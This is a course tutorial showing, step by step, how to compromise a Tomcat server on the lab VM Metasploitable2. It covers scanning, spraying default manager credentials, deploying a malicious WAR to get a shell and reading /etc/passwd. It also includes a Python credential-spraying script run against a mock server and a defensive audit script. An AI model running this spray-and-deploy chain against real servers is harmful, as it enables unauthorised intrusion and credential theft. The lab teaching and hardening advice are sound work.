Information Security (old version)/Metasploit 2016. 6. 3. 13:39

Metasploit - 08. Vulnerability Discovery and Exploitation (Tomcat)

 

 

This material was put together for hands-on practice as part of a training course. If it is used for private or malicious purposes, the legal responsibility lies with the person doing so.

[Lab systems] Kali Linux, Firewall, Metasploitable2-Linux

 

 

 - Tomcat: see 'http://net123.tistory.com/245'

[Lab steps]

Scan -> attack the Tomcat manager login (default-credential guessing) -> obtain the manager ID/PASSWORD -> log in to the Tomcat manager page -> upload malicious code (a WAR file) -> gain control of Metasploitable2-Linux

The "Tomcat vulnerability" here is not a bug in Tomcat's code: it is a default manager credential (tomcat/tomcat) combined with the manager application's legitimate deploy function. Any Tomcat whose manager account is known or guessable is exposed to the same authenticated code-execution path, whatever its version.

 

 

 

Ex1) Scan '192.168.20.204'

 - Scan '192.168.20.204' with nmap (-sV for service/version detection). The result that matters for this exercise is Tomcat on 8180/tcp; the AJP connector on 8009/tcp belongs to the same Tomcat instance.

@ Kali Linux

 

root@kali:~# nmap -sV 192.168.20.204

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 14:09 KST
Nmap scan report for 192.168.20.204
Host is up (0.00022s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell       Netkit rshd
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:34:5A:8A (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds

 

 

 

 

Ex2) Connection test to the Metasploitable2-Linux Tomcat server

@ Kali Linux

 - Use Firefox to confirm that the Metasploitable2-Linux Tomcat server (port 8180) is reachable and that the manager application is exposed. The /manager/html URL answers with an HTTP Basic authentication prompt (a 401 response); that prompt is what the login scanner in the next step drives.

 

 root@kali:~# firefox http://192.168.20.204:8180

 root@kali:~# firefox http://192.168.20.204:8180/manager/html

 

 

 

 

Ex3) Attack the Tomcat manager login (default credentials)

 

root@kali:~# msfconsole -q


msf > search tomcat

~ (output omitted) ~

 

msf > search tomcat_mgr_login

Matching Modules
================

   Name                                     Disclosure Date  Rank    Description
   ----                                     ---------------  ----    -----------
   auxiliary/scanner/http/tomcat_mgr_login                   normal  Tomcat Application Manager Login Utility

 

 

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) >
msf auxiliary(tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
~ (output omitted) ~

 

 

msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204

msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180


msf auxiliary(tomcat_mgr_login) > exploit

[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: )

~ (output omitted) ~

 

[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: tomcat:role1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: tomcat:root (Incorrect: )
[+] 192.168.20.204:8180 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:admin (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:manager (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:role1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:root (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:tomcat (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:s3cret (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: j2deployer:j2deployer (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: cxsdk:kdsxc (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: root:owaspbwa (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: ADMIN:ADMIN (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: xampp:xampp (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: QCC:QLogic66 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >
msf auxiliary(tomcat_mgr_login) > exit
root@kali:~#
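The credential check above is worth seeing at the HTTP level. The following Python script is an added example (not part of the original post and not Metasploit's own code): it stands up a small mock of the Tomcat Manager's HTTP Basic authentication on localhost as a constructed stand-in for 192.168.20.204:8180, then replays a subset of the default user:password pairs the module tried. The mock server, the port and the accepted credential tomcat/tomcat are constructed for the demo; the request/response shape (401 with WWW-Authenticate: Basic realm=..., then a GET carrying Authorization: Basic base64(user:pass)) is what the real manager does.

```python
"""Replay, at the HTTP level, the default-credential check that
auxiliary/scanner/http/tomcat_mgr_login performed in Ex3.

Added example: not from the original post and not Metasploit's code. A small
mock of the Tomcat Manager's HTTP Basic authentication runs on localhost as a
constructed stand-in for 192.168.20.204:8180, so everything works offline.
"""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

MANAGER_PATH = "/manager/html"

# Subset of the user:password pairs the module tried above (its default
# wordlists tomcat_mgr_default_users.txt / tomcat_mgr_default_pass.txt).
DEFAULT_PAIRS = [
    ("admin", "admin"), ("admin", "manager"), ("admin", "role1"),
    ("tomcat", "role1"), ("tomcat", "root"), ("tomcat", "tomcat"),
    ("both", "admin"), ("both", "tomcat"), ("both", "s3cret"),
    ("j2deployer", "j2deployer"), ("ovwebusr", "OvW*busr1"),
    ("cxsdk", "kdsxc"), ("root", "owaspbwa"), ("ADMIN", "ADMIN"),
    ("xampp", "xampp"), ("QCC", "QLogic66"),
]


class MockTomcatManager(BaseHTTPRequestHandler):
    """Constructed stand-in for the target: only Basic 'tomcat:tomcat' is valid."""
    VALID = "Basic " + base64.b64encode(b"tomcat:tomcat").decode()

    def do_GET(self):
        if self.path != MANAGER_PATH:
            self.send_error(404)
            return
        if self.headers.get("Authorization", "") == self.VALID:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"<html>Tomcat Web Application Manager</html>")
        else:
            # Server side of the exchange: 401 plus the realm the client must
            # answer with an Authorization header (no session, no CSRF token).
            self.send_response(401)
            self.send_header("WWW-Authenticate",
                             'Basic realm="Tomcat Manager Application"')
            self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo output to the [+]/[-] lines below


def start_mock_manager():
    """Start the mock on an ephemeral localhost port; returns (host, port, server)."""
    srv = HTTPServer(("127.0.0.1", 0), MockTomcatManager)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host, port = srv.server_address[:2]
    return host, port, srv


def try_login(host, port, user, password, path=MANAGER_PATH):
    """One attempt: GET the manager page with 'Authorization: Basic b64(user:pass)'.
    True only when the manager answers 200 (401 means wrong credentials)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers={"Authorization": "Basic " + token})
        return conn.getresponse().status == 200
    finally:
        conn.close()


def spray_defaults(host, port, pairs=DEFAULT_PAIRS, stop_on_success=True):
    """Equivalent of running the module: returns the list of working (user, pass)
    pairs; stop_on_success mirrors the STOP_ON_SUCCESS option."""
    found = []
    for user, password in pairs:
        ok = try_login(host, port, user, password)
        print(f"{'[+]' if ok else '[-]'} {host}:{port} {user}:{password}")
        if ok:
            found.append((user, password))
            if stop_on_success:
                break
    return found


if __name__ == "__main__":
    host, port, srv = start_mock_manager()
    print("working credentials:", spray_defaults(host, port))
    srv.shutdown()
```

Two caveats for real targets. Tomcat 5.5 on Metasploitable2 has no lockout, but Tomcat 7 and later ship a LockOutRealm in the default server.xml that locks an account after repeated failures (5 failures, 300-second lockout in the default configuration), so spraying a full wordlist at BRUTEFORCE_SPEED 5 can lock the account and turn a valid credential into a false negative. And every attempt, successful or not, is an authentication event in the server's logs.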

 


 

 

Ex4) Log in to the Metasploitable2-Linux Tomcat manager page as 'tomcat/tomcat'

 root@kali:~# firefox http://192.168.20.204:8180/manager/html

Log in with 'tomcat/tomcat' at the browser's HTTP Basic authentication prompt.

 

 

 

 

Tomcat manager page login succeeded.

The manager page's "WAR file to deploy" form is available: anyone holding a manager credential can deploy an arbitrary web application, which is exactly what the next step automates.

 

 

 

 

Ex5) Upload malicious code (authenticated WAR deployment)

 

root@kali:~# msfconsole -q

msf > search tomcat_mgr_deploy

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/multi/http/tomcat_mgr_deploy  2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution

 


msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) >
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic

 

 

msf exploit(tomcat_mgr_deploy) > show payloads

Compatible Payloads
===================

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   generic/custom                                   normal  Custom Payload
   generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline

 

 

msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat             //  in newer versions of this module the option is HttpPassword
PASSWORD => tomcat


msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.20.204
RHOST => 192.168.20.204


msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180


msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat             //  in newer versions of this module the option is HttpUsername
USERNAME => tomcat

 

msf exploit(tomcat_mgr_deploy) > set PAYLOAD java/shell/bind_tcp
PAYLOAD => java/shell/bind_tcp

Note: java/shell/bind_tcp makes the target listen on LPORT (4444) and Kali connects to it, so the lab firewall must allow that inbound connection to Metasploitable2. Where it does not, choose a reverse payload (for example java/shell_reverse_tcp) and set LHOST to the Kali address so the target connects back instead.

 

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     192.168.20.204   yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Payload options (java/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.20.204   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic

 


msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6070 bytes as vWzzfJQnXBNpnKWRqgDlpvtW.war ...
[*] Executing /vWzzfJQnXBNpnKWRqgDlpvtW/80DdE2UD8LI6z1F7aNIX34OiaC99nM.jsp...
[*] Undeploying vWzzfJQnXBNpnKWRqgDlpvtW ...
[*] Sending stage (2952 bytes) to 192.168.20.204
[*] Command shell session 1 opened (192.168.20.50:42280 -> 192.168.20.204:4444) at 2016-06-03 14:48:15 +0900

 

 

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

hostname
metasploitable

dir
bin    dev   initrd      lost+found  nohup.out  root  sys  var
boot   etc   initrd.img  media       opt        sbin  tmp  vmlinuz
cdrom  home  lib         mnt         proc       srv   usr

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
~ (output omitted) ~

id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

The shell runs as the Tomcat service account (tomcat55), not root: the WAR deployment gives code execution with whatever privileges Tomcat itself has, and getting root on Metasploitable2 is a separate privilege-escalation step. Note also that the module undeployed its WAR after the JSP ran (the "Undeploying ..." line above), but the deploy/undeploy requests and the random application name are still recorded in Tomcat's logs.

 

exit

[*] 192.168.20.204 - Command shell session 2 closed.  Reason: Died from EOFError

msf exploit(tomcat_mgr_deploy) >
msf exploit(tomcat_mgr_deploy) > quit
root@kali:~#
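The reason tomcat/tomcat worked is the Tomcat user database, conf/tomcat-users.xml, which on Tomcat 5.5 holds plaintext passwords and role assignments. As an added example (not from the original post or the Tomcat project), the Python script below audits such a file for exactly the condition exploited in Ex3 to Ex5: an account that holds a manager-capable role and uses a default or weak password. The embedded XML is a constructed sample modelled on the stock Tomcat 5.5 file with the manager role added to the tomcat user as on Metasploitable2; it is not the target's actual file. The role names come from Tomcat's Manager documentation, the default credential set is a subset of the pairs the module tried above, and the 12-character length threshold is an arbitrary policy choice for the example.

```python
"""Audit a Tomcat conf/tomcat-users.xml for the condition exploited in Ex3-Ex5:
an account with a manager-capable role that uses a default or weak password.

Added example: not from the original post or the Tomcat project. The embedded
XML is a constructed sample modelled on the stock Tomcat 5.5 file, with the
manager role given to 'tomcat' as on Metasploitable2; it is not the target's
real file.
"""
import xml.etree.ElementTree as ET

# Roles that grant deploy/undeploy rights. Tomcat 5.5/6 use the single role
# 'manager'; Tomcat 7+ split it into manager-gui/-script/-jmx/-status and use
# admin-gui/-script for the Host Manager. 'admin' is the 5.5 admin webapp.
MANAGER_ROLES = {
    "manager", "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin", "admin-gui", "admin-script",
}

# Stock/default pairs, a subset of the wordlists the module used above.
DEFAULT_CREDS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("both", "tomcat"),
    ("role1", "tomcat"), ("admin", "admin"), ("admin", "manager"),
}

MIN_PASSWORD_LEN = 12  # policy threshold chosen for this example

# Constructed sample (assumption: same shape as the Metasploitable2 file).
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
  <user username="deployer" password="Zj7pq" roles="manager"/>
  <user username="ops" password="c0rrect-horse-battery-staple-2016" roles="manager"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return [(username, reason, [manager roles])] for risky manager accounts.
    Accounts without a manager-capable role are ignored: they cannot deploy a WAR."""
    findings = []
    for user in ET.fromstring(xml_text).iter("user"):
        # Tomcat's MemoryUserDatabase reads 'username' and falls back to 'name'.
        name = user.get("username") or user.get("name") or ""
        password = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        manager_roles = sorted(roles & MANAGER_ROLES)
        if not manager_roles:
            continue
        if (name, password) in DEFAULT_CREDS:
            findings.append((name, "default credential in Metasploit wordlist", manager_roles))
        elif password.lower() == name.lower() or len(password) < MIN_PASSWORD_LEN:
            findings.append((name, "weak password for a manager-capable account", manager_roles))
    return findings


if __name__ == "__main__":
    for name, reason, roles in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"[!] {name} ({', '.join(roles)}): {reason}")
```

What it flags is the whole precondition of this walkthrough, so the fixes are correspondingly simple: give manager roles only to a dedicated account with a long random password, on Tomcat 7+ use manager-script for automation and keep manager-gui off anything reachable from untrusted networks, and remove the Manager application altogether where it is not needed. On Tomcat 5.5 the file is plaintext on disk, so the tomcat55 shell obtained in Ex5 can typically read it directly and harvest every credential in it.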

 

 

[YouTube] Video lecture link

Metasploit - Chapter 1: Metasploit

Posted by instructor 김정우 (KakaoTalk: kim10322)